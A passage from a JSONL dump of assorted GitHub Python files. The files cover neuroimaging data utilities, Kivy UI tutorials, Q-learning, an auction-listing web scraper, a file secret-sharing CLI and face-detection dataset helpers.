enumerate(coco_id_by_trial):\n catnms = load_objects_in_COCO(id)\n if cat in catnms:\n subset_idx.append(i)\n else:\n negsubset_idx.append(i)\n if negcat:\n return negsubset_idx\n else:\n return subset_idx\n\n\ndef find_trial_indexes(subj, cat=\"person\", output_dir=\"output\"):\n coco_id = np.load(\"%s/coco_ID_of_repeats_subj%02d.npy\" % (output_dir, subj))\n\n idx1, idx2 = [], []\n for i, id in enumerate(coco_id):\n catnms = load_objects_in_COCO(id)\n if cat in catnms:\n idx1.append(i)\n else:\n idx2.append(i)\n return idx1, idx2\n\n\ndef extract_test_image_ids(subj=1, output_dir=\"output\"):\n from sklearn.model_selection import train_test_split\n\n _, test_idx = train_test_split(range(10000), test_size=0.15, random_state=42)\n coco_id = np.load(\"%s/coco_ID_of_repeats_subj%02d.npy\" % (output_dir, subj))\n test_image_id = coco_id[test_idx]\n return test_image_id, test_idx\n\n\ndef extract_single_roi(roi_name, output_dir, subj):\n from util.model_config import roi_name_dict\n from extract_cortical_voxel import extract_cortical_mask\n\n output_masks, roi_labels = list(), list()\n try:\n roi_mask = np.load(\n \"%s/voxels_masks/subj%01d/roi_1d_mask_subj%02d_%s.npy\"\n % (output_dir, subj, subj, roi_name)\n )\n except FileNotFoundError:\n roi_mask = extract_cortical_mask(subj, roi=roi_name, output_dir=output_dir)\n roi_mask = np.load(\n \"%s/voxels_masks/subj%01d/roi_1d_mask_subj%02d_%s.npy\"\n % (output_dir, subj, subj, roi_name)\n )\n\n roi_dict = roi_name_dict[roi_name]\n for k, v in roi_dict.items():\n if int(k) > 0:\n if np.sum(roi_mask == int(k)) > 0:\n output_masks.append(roi_mask == int(k))\n roi_labels.append(v)\n return output_masks, roi_labels\n\n\ndef compute_sample_performance(model, subj, output_dir, masking=\"sig\", measure=\"corrs\"):\n \"\"\"\n Returns sample-wise performances for encoding model.\n \"\"\"\n if measure == \"corrs\":\n from scipy.stats import pearsonr\n\n metric = pearsonr\n elif measure == \"rsq\":\n from sklearn.metrics import r2_score\n\n metric = r2_score\n\n try:\n sample_corrs = np.load(\n \"%s/output/clip/%s_sample_%s_%s.npy\" % (output_dir, model, measure, masking)\n )\n if len(sample_corrs.shape) == 2:\n sample_corrs = np.array(sample_corrs)[:, 0]\n np.save(\n \"%s/output/clip/%s_sample_corrs_%s.npy\" % (output_dir, model, masking),\n sample_corrs,\n )\n except FileNotFoundError:\n yhat, ytest = load_model_performance(\n model, output_root=output_dir, measure=\"pred\"\n )\n if masking == \"sig\":\n pvalues = load_model_performance(\n model, output_root=output_dir, measure=\"pvalue\"\n )\n sig_mask = pvalues <= 0.05\n\n sample_corrs = [\n metric(ytest[:, sig_mask][i, :], yhat[:, sig_mask][i, :])\n for i in range(ytest.shape[0])\n ]\n\n else:\n roi = np.load(\n \"%s/output/voxels_masks/subj%01d/roi_1d_mask_subj%02d_%s.npy\"\n % (output_dir, subj, subj, masking)\n )\n roi_mask = roi > 0\n sample_corrs = [\n metric(ytest[:, roi_mask][i, :], yhat[:, roi_mask][i, :])\n for i in range(ytest.shape[0])\n ]\n\n if measure == \"corr\":\n sample_corrs = np.array(sample_corrs)[:, 0]\n np.save(\n \"%s/output/clip/%s_sample_%s_%s.npy\"\n % (output_dir, model, measure, masking),\n sample_corrs,\n )\n\n return sample_corrs\n","repo_name":"ariaaay/clip2brain","sub_path":"src/util/data_util.py","file_name":"data_util.py","file_ext":"py","file_size_in_byte":7291,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"36859811753","text":"# Download and import the MIT 6.S191 package\nimport mitdeeplearning as mdl\nimport numpy as np\nimport json\n\n\n\ndef main():\n songs = mdl.lab1.load_training_data()\n\n # # Print one of the songs to inspect it in greater detail!\n # example_song = songs[0]\n # print(\"\\nExample song: \")\n # print(example_song)\n\n # Join our list of song strings into a single string containing all songs\n \n songs_joined = \"\\n\\n\".join(songs) \n\n # Find all unique characters in the joined string\n \n vocab = sorted(set(songs_joined))\n # print(\"There are\", len(vocab), \"unique characters in the dataset\")\n # # create two lookup tables\n # 1. text to integers\n \n char2idx = {u:i for i, u in enumerate(vocab)}\n # json.dump(char2idx, open(\"../input/char2idx.json\",'w'))\n # Create a mapping from indices to characters. This is\n # the inverse of char2idx and allows us to convert back\n # from unique index to the character in our vocabulary.\n \n idx2char = np.array(vocab)\n # np.savetxt('../input/idx2char.txt', idx2char, fmt='%s' )\n\n # print('{')\n # for char,_ in zip(char2idx, range(20)):\n # print(' {:4s}: {:3d},'.format(repr(char), char2idx[char]))\n # print(' ...\\n}')\n\nif __name__ == \"__main__\" :\n main()\n\n\n","repo_name":"osvamsi/Music_Generation_LSTMS","sub_path":"src/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":1268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"12357346972","text":"import joblib\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.patches as mpatches\r\nfrom spectral_tiffs import read_mtiff, read_stiff, write_mtiff, write_stiff\r\nimport numpy as np\r\nfrom skimage import color\r\nfrom sklearn.metrics import classification_report\r\nfrom sklearn.metrics import confusion_matrix\r\nfrom sklearn.metrics import ConfusionMatrixDisplay\r\nfrom sklearn.metrics import jaccard_score\r\n\r\ndef analyze(image):\r\n model1 = joblib.load('C:/Users/Admin/Documents/idp/OneDrive_1_3-13-2021/Python-scripts/gd_model.pkl')\r\n\r\n\r\n Blue_dye = [0,255,255]\r\n Red_dye = [128,0,0]\r\n ICG = [0,255,0]\r\n Stroma_ICG= [255,255,255]\r\n Stroma = [128,128,128]\r\n Umbilical_cord = [255,242,0]\r\n Suture = [128,128,0]\r\n Artery_ICG = [34,177,76]\r\n Vein = [63,72,204]\r\n Artery = [237,28,36]\r\n non = [0,0,0]\r\n colors=[non, Blue_dye, Red_dye, ICG, Stroma_ICG, Stroma, Umbilical_cord,\r\n Suture, Artery_ICG, Vein, Artery]\r\n lbl_handles=[\"non\", \"Blue_dye\", \"Red_dye\", \"ICG\", \"Stroma_ICG\", \"Stroma\", \"Umbilical_cord\",\r\n \"Suture\", \"Artery_ICG\", \"Vein\", \"Artery\"]\r\n v = np.zeros((1024,1024,3))\r\n \r\n \r\n \r\n img = \"C:/Users/Admin/Documents/idp/OneDrive_1_3-13-2021/prediction/upper_6_icg.tif\"\r\n #img = image\r\n spim,w,rgb,meta = read_stiff(img)\r\n \r\n sx = []\r\n for i in range (0,1024):\r\n for j in range (0,1024):\r\n temp = []\r\n for z in range (0,38):\r\n temp.append(spim[i,j,z])\r\n sx.append(temp)\r\n \r\n \r\n \r\n \r\n prediction = model1.predict(np.array(sx))\r\n prediction = prediction.reshape((1024,1024))\r\n for i in range (prediction.shape[0]):\r\n for j in range (prediction.shape[1]):\r\n if (prediction[i,j]>0):\r\n v[i,j]=colors[prediction[i,j]]\r\n else:\r\n v[i,j]=rgb[i,j]\r\n v = v/255\r\n labels = np.unique(prediction)\r\n patches = []\r\n for i in range(labels.shape[0]):\r\n c = np.array((colors[labels[i]]))/255\r\n patch= mpatches.Patch(color=c, label=lbl_handles[labels[i]])\r\n patches.append(patch)\r\n px = 1/plt.rcParams['figure.dpi']\r\n plt.figure(figsize=(512*px, 512*px))\r\n plt.imshow(v)\r\n plt.legend(handles=patches, fontsize='small',loc='upper left',bbox_to_anchor=(1, 1))\r\n #plt.show()\r\n path = img+'_mask.png'\r\n plt.savefig(path,bbox_inches=\"tight\")\r\n\r\n return path\r\n","repo_name":"lidiatekeste2312/Placenta-Spectral-Image-Segmentation","sub_path":"GD_prediction.py","file_name":"GD_prediction.py","file_ext":"py","file_size_in_byte":2401,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"21403545197","text":"import gym\nimport random\nimport numpy as np\n\nenvironment = gym.make(\"FrozenLake-v1\", is_slippery=False, render_mode='human')\nenvironment.reset()\nenvironment.render()\n\nqtable = np.zeros((16, 4))\n\n# Alternatively, the gym library can also directly g\n# give us the number of states and actions using\n# \"env.observation_space.n\" and \"env.action_space.n\"\nnb_states = environment.observation_space.n # = 16\nnb_actions = environment.action_space.n # = 4\nqtable = np.zeros((nb_states, nb_actions))\n\n# Let's see how it looks\nprint('Q-table =')\nprint(qtable)\n\nrandom.choice([\"LEFT\", \"DOWN\", \"RIGHT\", \"UP\"])\n\nenvironment.action_space.sample()\n\nenvironment.step(2)\nenvironment.render()\n\n# 1. Randomly choose an action using action_space.sample()\naction = environment.action_space.sample()\n\n# 2. Implement this action and move the agent in the desired direction\nnew_state, reward, done, info, _ = environment.step(action)\n\n# Display the results (reward and map)\nenvironment.render()\nprint(f'Reward = {reward}')\n\n","repo_name":"Trace2333/QlearningByTrace","sub_path":"ql_test.py","file_name":"ql_test.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"29743185325","text":"# This is a sample Python script.\n\n# Press Shift+F10 to execute it or replace it with your code.\n# Press Double Shift to search everywhere for classes, files, tool windows, actions, and settings.\n\n\"\"\"\ndef print_hi(name):\n # Use a breakpoint in the code line below to debug your script.\n print(f'Hi, {name}') # Press Ctrl+F8 to toggle the breakpoint.\n\n\n# Press the green button in the gutter to run the script.\nif __name__ == '__main__':\n print_hi('PyCharm')\n\n# See PyCharm help at https://www.jetbrains.com/help/pycharm/\n\n\"\"\"\n\n# https://github.com/attreyabhatt/KivyMD-Basics\n\n'''\nfrom kivy.app import App\nfrom kivy.uix.textinput import TextInput\n\n\nclass MainApp(App):\n def build(self):\n value = TextInput(text=\"Enter value here\")\n return value\n\nMainApp().run()\n\n'''\n# LABELS\n\n\"\"\"\nfrom kivymd.app import MDApp\nfrom kivymd.uix.label import MDLabel, MDIcon\nfrom kivymd.font_definitions import theme_font_styles\n\n\nclass DemoApp(MDApp):\n def build(self):\n # halign = horizontal align\n\n label = MDLabel(text=\"Hello world\", halign=\"center\", theme_text_color=\"Error\",\n font_style=\"Subtitle2\")\n\n # label = MDLabel(text=\"Hello world\", halign=\"center\",theme_text_color=\"Custom\",\n # text_color=(0,0,1,1))\n\n # label = MDIcon(icon=\"language-python\", halign=\"center\")\n return label\n\n\nDemoApp().run()\n\n\"\"\"\n\n# BUTTONS\n\n'''\nfrom kivy.app import App\nfrom kivy.metrics import dp\nfrom kivy.uix.behaviors import TouchRippleBehavior\nfrom kivy.uix.button import Button\nfrom kivy.lang import Builder\n\n\nKV = \"\"\"\n:\n ripple_color: 0, 0, 0, .2\n background_color: 0, 0, 0, 0\n color: root.primary_color\n canvas.before:\n Color:\n rgba: root.primary_color\n Line:\n width: 1\n rectangle: (self.x, self.y, self.width, self.height)\nScreen:\n canvas:\n Color:\n rgba: 0.9764705882352941, 0.9764705882352941, 0.9764705882352941, 1\n Rectangle:\n pos: self.pos\n size: self.size\n\"\"\"\n\n\nclass RectangleFlatButton(TouchRippleBehavior, Button):\n primary_color = [\n 0.12941176470588237,\n 0.5882352941176471,\n 0.9529411764705882,\n 1\n ]\n\n def on_touch_down(self, touch):\n collide_point = self.collide_point(touch.x, touch.y)\n if collide_point:\n touch.grab(self)\n self.ripple_show(touch)\n return True\n return False\n\n def on_touch_up(self, touch):\n if touch.grab_current is self:\n touch.ungrab(self)\n self.ripple_fade()\n return True\n return False\n\n\nclass MainApp(App):\n def build(self):\n screen = Builder.load_string(KV)\n screen.add_widget(\n RectangleFlatButton(\n text=\"Hello, World\",\n pos_hint={\"center_x\": 0.5, \"center_y\": 0.5},\n size_hint=(None, None),\n size=(dp(110), dp(35)),\n ripple_color=(0.8, 0.8, 0.8, 0.5),\n )\n )\n return screen\n\n\nMainApp().run()\n\n'''\n\n# TEXT FIELD\n\n\"\"\"\n\nfrom kivymd.app import MDApp\nfrom kivymd.uix.screen import Screen\nfrom kivymd.uix.textfield import MDTextField\nfrom kivy.core.window import Window\n\nWindow.size = (360, 600)\n\n\nclass DemoApp(MDApp):\n def build(self):\n screen = Screen()\n\n username = MDTextField(text=\"Enter Weight\",\n helper_text=\"This will disappear when you click off\",\n helper_text_mode=\"on_focus\",\n pos_hint={'center_x': 0.5, 'center_y': 0.5},\n size_hint_x=None, width=200)\n screen.add_widget(username)\n return screen\n\n\nDemoApp().run()\n\n\"\"\"\n# THEMES\n\n'''\n1) What is a theme?\n2) primary_palette on buttons\n3) Color Options in primary_palette - Available options are: ‘Red’, ‘Pink’, ‘Purple’, ‘DeepPurple’, ‘Indigo’, ‘Blue’, ‘LightBlue’, ‘Cyan’, ‘Teal’, ‘Green’, ‘LightGreen’, ‘Lime’, ‘Yellow’, ‘Amber’, ‘Orange’, ‘DeepOrange’, ‘Brown’, ‘Gray’, ‘BlueGray’.\n4) Primary hue option - ‘50’, ‘100’, ‘200’, ‘300’, ‘400’, ‘500’, ‘600’, ‘700’, ‘800’, ‘900’, ‘A100’, ‘A200’, ‘A400’, ‘A700’.\n5) theme_style - Dark or Light two options\n'''\n\n'''\n\nfrom kivymd.app import MDApp\nfrom kivymd.uix.screen import Screen\nfrom kivymd.uix.button import MDRectangleFlatButton\n\n\nclass DemoApp(MDApp):\n\n def build(self):\n self.theme_cls.primary_palette = \"Orange\"\n self.theme_cls.primary_hue = \"100\"\n self.theme_cls.theme_style = \"Dark\"\n screen = Screen()\n btn_flat = MDRectangleFlatButton(text='Hello World',\n pos_hint={'center_x': 0.5, 'center_y': 0.5})\n screen.add_widget(btn_flat)\n return screen\n\n\nDemoApp().run()\n\n'''\n\n# LIST\n\n\"\"\"\n1) Example of List - https://github.com/HeaTTheatR/KivyMD-data/raw/master/gallery/kivymddoc/lists.png\n2) Create -> OneLineListItem\nhttps://raw.githubusercontent.com/HeaTTheatR/KivyMD-data/master/gallery/kivymddoc/lists.gif\n\n3) Flow to create a list : OneLineListItem-> MDList -> ScrollView -> Screen\n4) Create a for loop to add more items\n5) Create a TwoLineListItem(secondary_text), ThreeLineListItem (tertiary_text)\n\n- Flow to Icon/Avatar list : IconLeftWidget/IconRightWidget -> OneLineListItem-> MDList -> ScrollView -> Screen\n6) Add a OneLineIconListItem\n7) Add a OneLineAvatarListItem\n\n8) Use the Builder method to create a list\n\n\"\"\"\n\n'''\n# VER 1\n\nfrom kivymd.app import MDApp\nfrom kivy.lang import Builder\nfrom kivymd.uix.list import OneLineListItem\n\nlist_helper = \"\"\"\nScreen:\n ScrollView:\n MDList:\n id: container\n\n\"\"\"\n\n\nclass DemoApp(MDApp):\n\n def build(self):\n screen = Builder.load_string(list_helper)\n return screen\n\n def on_start(self):\n for i in range(20):\n item = OneLineListItem(text='Item ' + str(i))\n self.root.ids.container.add_widget(item)\n\n\nDemoApp().run()\n\n'''\n\n# VER 2\n\n\"\"\"\nfrom kivymd.app import MDApp\nfrom kivymd.uix.screen import Screen\nfrom kivymd.uix.list import OneLineListItem, MDList, TwoLineListItem, ThreeLineListItem\nfrom kivymd.uix.list import OneLineIconListItem, IconLeftWidget\nfrom kivy.uix.scrollview import ScrollView\n\n\nclass DemoApp(MDApp):\n\n def build(self):\n screen = Screen()\n\n # Creating a Simple List\n scroll = ScrollView()\n\n list_view = MDList()\n for i in range(20):\n\n # items = ThreeLineListItem(text=str(i) + ' item',\n # secondary_text='This is ' + str(i) + 'th item',\n # tertiary_text='hello')\n\n icons = IconLeftWidget(icon=\"android\")\n items = OneLineIconListItem(text=str(i) + ' item')\n items.add_widget(icons)\n list_view.add_widget(items)\n\n scroll.add_widget(list_view)\n # End List\n\n screen.add_widget(scroll)\n return screen\n\n\nDemoApp().run()\n\n\"\"\"\n\n# TOOLBARS\n# https://www.youtube.com/watch?v=iicfEqNBb-4\n\nfrom kivymd.app import MDApp\nfrom kivymd.uix.screen import Screen\nfrom kivy.lang import Builder\nfrom kivy.core.window import Window\n\nWindow.size = (300, 500)\n\nscreen_helper = \"\"\"\nScreen:\n BoxLayout:\n orientation: 'vertical'\n MDToolbar:\n title: 'Demo Application'\n left_action_items: [[\"menu\", lambda x: app.navigation_draw()]]\n right_action_items: [[\"dots-vertical\", lambda x: app.callback()], [\"clock\", lambda x: app.callback_2()]]\n elevation:5\n\n MDLabel:\n text: 'hello world'\n halign: 'center'\n\"\"\"\n\n\nclass DemoApp(MDApp):\n\n def build(self):\n self.theme_cls.primary_palette = \"Red\"\n screen = Builder.load_string(screen_helper)\n\n return screen\n\n def navigation_draw(self):\n print(\"Navigation\")\n\n\nDemoApp().run()","repo_name":"vlad4canada/KivyProject","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"37666265770","text":"\nfrom django.contrib import admin\nfrom django.urls import path,include\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('', include('homepage.urls')),\n path('service/', include('servicepage.urls')),\n path('contact/', include('contactpage.urls')),\n path('blog/', include('blogpage.urls')),\n path('ckeditor/', include('ckeditor_uploader.urls')),\n \n]\n\nif settings.DEBUG:\n #urlpatterns += staticfiles_urlpatterns()\n urlpatterns += static(settings.STATIC_URL,document_root=settings.STATIC_URL)\n urlpatterns += static(settings.MEDIA_URL,document_root=settings.MEDIA_ROOT)\n","repo_name":"hosenmdaltaf/beauty_fasion","sub_path":"beauty_fasion_main/beauty_fasion/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"40186351746","text":"from multiprocessing import Process\nfrom multiprocessing import Queue\nfrom time import sleep\na=0\n\ndef task1(q):\n global a\n q.put(10)\n for a in range(10):\n a = a + 1\n print('--', a)\n\n\n\ndef task2(q):\n global a\n\n for a in range(10):\n a = a + 2\n print('--', a)\n q.put(10)\n\n\nif __name__ == '__main__':\n q=Queue(maxsize=10)\n # print(q.get(block=False))\n # print(q.get())\n p1=Process(target=task1,args=(q,))\n p1.start()\n p1.join()\n print(q.get(block=False))\n p2=Process(target=task2,args=(q,))\n p2.start()\n # p2.join()\n print(q.get())\n # print(a.bit_length())\n # p2.join()\n # while 1:\n # print(q.get())\n\n","repo_name":"xiaolcqbug/aiai","sub_path":"Add/进程间通信.py","file_name":"进程间通信.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"37697305677","text":"import json\nimport os\nfrom miner_text_generator import extract_text_by_page\ndef export_as_json(pdf_path, json_path):\n filename=os.path.splitext(os.path.basename(pdf_path))[0]\n data={}\n for line in extract_text_by_page(pdf_path):\n command,description=line.strip().split(None, 1)\n data[command]=description.strip()\n out_file = open(json_path,'w')\n json.dump(data, out_file)\nif __name__ == '__main__':\n pdf_path = 'Interview_sample_data.pdf'\n json_path = 'sample_data.json'\n export_as_json(pdf_path, json_path)","repo_name":"SreevidyaVK/Techworld","sub_path":"myprogram.py","file_name":"myprogram.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"18636683908","text":"import csv\nimport json\nimport openpyxl\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.service import Service\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom selenium.webdriver.common.by import By\nfrom auction_scraper_base import get_property_type, prepare_price, get_bedroom, get_tenure, parse_postal_code\n\n\nclass NetworkAuction:\n driver: webdriver.Chrome\n\n def __init__(self):\n service = Service(executable_path=ChromeDriverManager().install())\n self.driver = webdriver.Chrome(service=service)\n\n def property_scraper(self, property_link):\n self.driver.get(property_link)\n print(property_link)\n\n image = self.driver.find_element(By.XPATH, \"(//img[@alt='Lot Image'])[1]\")\n image_link = image.get_attribute(\"src\")\n\n guidePrice = self.driver.find_element(By.XPATH, \"//span[contains(@class,'current-bid ')]\").text\n price, currency = prepare_price(guidePrice)\n\n description = self.driver.find_element(By.XPATH, \"(//div[contains(@class,'lot-data-text')])[1]\").text\n number_of_bedrooms = get_bedroom(description)\n\n address = self.driver.find_element(By.XPATH, \"(//h1[@class='h3'])[1]\").text\n postal_code = parse_postal_code(address)\n\n tenure = get_tenure(description)\n\n title = self.driver.find_element(\n By.XPATH, \"//div[@class='lot-highlights']\").text\n\n property_type = get_property_type(description)\n\n if property_type == \"other\":\n property_type = get_property_type(description)\n if not tenure:\n tenure = get_tenure(description)\n\n data_hash = {\n \"price\": price,\n \"currency_type\": currency,\n \"picture_link\": image_link,\n \"property_description\": description,\n \"property_link\": property_link,\n \"address\": address,\n \"postal_code\": postal_code,\n \"auction_venue\": \"online\",\n \"source\": \"pugh-auctions\",\n \"property_type\": property_type,\n \"number_of_bedrooms\": number_of_bedrooms,\n \"tenure\": tenure,\n }\n return data_hash\n\n def properties_scraper(self):\n auction_divs = []\n button = self.driver.find_element(By.XPATH, \"//a[contains(text(),'All')]\")\n button.click()\n for auction_divs_href in self.driver.find_elements(\n By.XPATH, \"//div[contains(@class,'auction-card')]/a[contains(.,'Find out more')]\"):\n auction_property = auction_divs_href.get_attribute('href')\n print(auction_property)\n auction_divs.append(auction_property)\n\n workbook = openpyxl.Workbook()\n worksheet = workbook.active\n csv_fh = open('sdl_auction_sel.csv', mode='w', newline='', encoding='utf8')\n json_fh = open(\"sdl_auction_sel.json\", \"w\", encoding='utf8')\n csv_writer = csv.writer(csv_fh)\n\n list_dict = []\n\n for property_link in auction_divs:\n result_dict = self.property_scraper(property_link)\n result_list = list(result_dict.values())\n worksheet.append(result_list)\n csv_writer.writerow(result_list)\n list_dict.append(result_dict)\n workbook.save(\"sdl_auction_sel.xlsx\")\n\n json_result = json.dumps(list_dict)\n json_fh.write(json_result)\n json_fh.close()\n workbook.close()\n csv_fh.close()\n\n def run(self):\n self.driver.get(\n \"https://www.sdlauctions.co.uk/property-auctions/timed-auctions/\")\n self.properties_scraper()\n\n\nauction = NetworkAuction()\nauction.run()\n","repo_name":"sheikhzain260/Auction-Scrapers-","sub_path":"Sdl Auctions/sdl_auction_sel.py","file_name":"sdl_auction_sel.py","file_ext":"py","file_size_in_byte":3620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"31931680731","text":"from __future__ import division\nfrom past.utils import old_div\nfrom SloppyCell.ReactionNetworks import *\n\n# Modifications to SBML...\n# Removed function LD, because it used 'ceil' which is not something we can deal\n# with\n# Replaced variable value_of_LD with light (more descriptive name)\n# Replaced calls to LD with light\n# Removed timeOfDay and dayLength variables\nnet = IO.from_SBML_file('BIOMD055-noceil.xml', 'base')\nnet.compile()\n\n# Set up a network that will switch light on/off at 12 hour intervals.\nnet1212 = net.copy('net_1212')\nnet1212.set_var_ic('light', 1)\nnet1212.add_parameter('turntime', 12, is_constant=False)\nnet1212.add_event('light_switch', 'gt(time, turntime)', {'light': '1-light',\n 'turntime': '12+time'})\nmutant_net = net1212.copy('cca1lhy')\nmutant_net.set_var_ic('p1', old_div(net.get_var_ic('p1'),1000))\n\n# Run to the limit cycle \ntraj = Dynamics.integrate(net1212, [0, 24*10])\nnet1212.set_var_ics(traj.get_var_vals_index(-1))\n# Go to limit cycle\ntraj = Dynamics.integrate(mutant_net, [0, 24*10])\nmutant_net.set_var_ics(traj.get_var_vals_index(-1))\n\nnet_12L_12D_12L_D = net1212.copy('net_12L_12D_12L_D')\nnet_12L_12D_12L_D.remove_component('light_switch')\nnet_12L_12D_12L_D.remove_component('turntime')\nnet_12L_12D_12L_D.set_var_ic('light', 1)\nnet_12L_12D_12L_D.add_event('off_12', 'gt(time, 12)', {'light': 0})\nnet_12L_12D_12L_D.add_event('on_24', 'gt(time, 24)', {'light': 1})\nnet_12L_12D_12L_D.add_event('off_36', 'gt(time, 36)', {'light': 0})\n\n# Run for twelve more hours to get to the dark part of the cycle\ntraj = Dynamics.integrate(net1212, [0, 12])\nnet1212.set_var_ics(traj.get_var_vals_index(-1))\n\nnet_12D_L = net1212.copy('net_12D_L')\nnet_12D_L.remove_component('light_switch')\nnet_12D_L.remove_component('turntime')\nnet_12D_L.set_var_ic('light', 0)\nnet_12D_L.add_event('on_12', 'gt(time, 12)', {'light': 1})\n\nmutant_12L_12D_12L_D = mutant_net.copy('mutant_12L_12D_12L_D')\nmutant_12L_12D_12L_D.remove_component('light_switch')\nmutant_12L_12D_12L_D.remove_component('turntime')\nmutant_12L_12D_12L_D.set_var_ic('light', 1)\nmutant_12L_12D_12L_D.add_event('off_12', 'gt(time, 12)', {'light': 0})\nmutant_12L_12D_12L_D.add_event('on_24', 'gt(time, 24)', {'light': 1})\nmutant_12L_12D_12L_D.add_event('off_36', 'gt(time, 36)', {'light': 0})\ntrajm = Dynamics.integrate(mutant_12L_12D_12L_D, [0, 96])\n\n# Run for twelve more hours to get to the dark part of the cycle\ntraj = Dynamics.integrate(mutant_net, [0, 12])\nmutant_net.set_var_ics(traj.get_var_vals_index(-1))\n\nmutant_12D_L = mutant_net.copy('mutant_12D_L')\nmutant_12D_L.remove_component('light_switch')\nmutant_12D_L.remove_component('turntime')\nmutant_12D_L.set_var_ic('light', 0)\nmutant_12D_L.add_event('on_12', 'gt(time, 12)', {'light': 1})\n\nnetworks = [net_12L_12D_12L_D, net_12D_L, mutant_12L_12D_12L_D, mutant_12D_L]\nint_times = [(0, 96), (0, 96), (0, 48), (0,48)]\n","repo_name":"GutenkunstLab/SloppyCell","sub_path":"Example/Gutenkunst2007/Locke_2005/Nets.py","file_name":"Nets.py","file_ext":"py","file_size_in_byte":2908,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"40236627851","text":"import click\nimport secrets\n\n@click.group()\ndef cli():\n pass\n\n\n@cli.command()\n@click.option('-n', type=int, required=True, help='Number of horcruxes to create')\n@click.option('-k', type=int, required=True, help='Number of horcruxes to recover original')\n@click.option('-o', default='./output', type=click.Path(exists=False), help='Destination directory')\n@click.option('--block-size', type=int, help=\"Size of block to operate on. Larger values are faster, but may result in horcruxes of different sizes. Defaults to 1/10th of file size\")\n@click.argument('file', type=click.Path(exists=True, readable=True))\ndef split(file, n: int, k: int, o, block_size):\n \"\"\"Splits a file into horcruxes\"\"\"\n import os\n os.makedirs(o, exist_ok=True)\n\n if n > k: \n print(\"WARN: n > k. Data will be irrecoverable. What a waste of CPU cycles.\")\n\n from horcruxes.cruxcreator import HorcruxCreateManager\n hcm = HorcruxCreateManager(file, n, k, block_size, o)\n hcm.write_headers()\n hcm.write()\n\n print(\"Operation successful.\")\n\n@cli.command()\n@click.option('-o', type=click.Path(exists=False), required=True, help='Destination directory')\n@click.argument('files-or-dir', type=click.Path(exists=True, readable=True), nargs=-1)\ndef bind(files_or_dir, o):\n \"\"\"Binds horcruxes back into the original. files-or-dir may be a list of files or a directory containing a list of horcrux files\"\"\"\n import os\n if os.path.dirname(o): os.makedirs(os.path.dirname(o), exist_ok=True)\n\n from horcruxes.cruxreverser import HorcruxReverseManager\n files = files_or_dir\n if len(files_or_dir) == 1 and os.path.isdir(files_or_dir[0]):\n files = [os.path.join(files_or_dir[0], file) for file in os.listdir(files_or_dir[0])]\n\n try:\n hrm = HorcruxReverseManager(files, o)\n hrm.decrypt()\n except ValueError as e:\n import sys\n print(f\"Invalid arguments: {e}\", file=sys.stderr)\n else:\n print(\"Operation successful.\")\n\nif __name__ == '__main__':\n cli()","repo_name":"X-yl/horcruxes","sub_path":"horcruxes/crux.py","file_name":"crux.py","file_ext":"py","file_size_in_byte":2007,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"28721254409","text":"import cv2\nfrom matplotlib import pyplot as plt\nimport numpy as np\n\n\ndef get_data(group, path):\n '''\n Creates a list of tuples, each with an image name and its bounding box statistics.\n Input:\n group: what picture group we want, e.g. couples\n path: path to the wider_faces_train_bbx_gt.txt\n Output:\n data: list of tuples of data (filename, bbs (list itself))\n '''\n # Based on https://towardsdatascience.com/how-do-you-train-a-face-detection-model-a60330f15fd5\n\n f = open(path, 'r')\n file = f.readlines()\n data = []\n count = 0\n\n for i in file:\n # Grab the files for specific group\n if group in i:\n\n # image name and remove \\n\n filename = file[count]\n filename = filename[:-1]\n\n # get bounding boxes\n numFaces = int(file[count + 1])\n bbsStart = count + 2\n boxes = []\n\n occ = 0\n pose = 0\n ill = 0\n for j in range(0, numFaces):\n face = file[bbsStart + j]\n bbs = face.split(' ')\n ill = max(ill, int(bbs[6]))\n occ = max(occ, int(bbs[8]))\n pose = max(pose, int(bbs[9]))\n bbs = bbs[:4]\n bbs = [int(k) for k in bbs]\n boxes.append(bbs)\n\n # Create a tuple with file name and list of bounding boxes, and save\n if occ != 0 or pose != 0 or ill != 0:\n pass\n else:\n temp = (filename, boxes)\n data.append(temp)\n\n count += 1\n return data\n\n\ndef min_dist(x, y, boxes):\n '''\n Finding the nearest bounding box (if not in order)\n Input:\n x: detected starting x\n y: detected starting y\n boxes: list of all the bounding boxes for the image\n '''\n mindist = 1e10 # arbitrary large number\n\n for k in range(0, len(boxes)):\n x1 = boxes[k][0]\n y1 = boxes[k][1]\n dist = np.sqrt((x1 - x) ** 2 + (y1 - x) ** 2) # Euclidean distance\n if dist < mindist:\n mindist = dist\n mink = k\n\n return mink\n\n\ndef get_iou(bb1, bb2):\n \"\"\"\n https://stackoverflow.com/questions/25349178/calculating-percentage-of-bounding-box-overlap-for-image-detector-evaluation\n Calculate the Intersection over Union (IoU) of two bounding boxes.\n\n Parameters\n ----------\n bb1 : dict\n Keys: {'x1', 'x2', 'y1', 'y2'}\n The (x1, y1) position is at the top left corner,\n the (x2, y2) 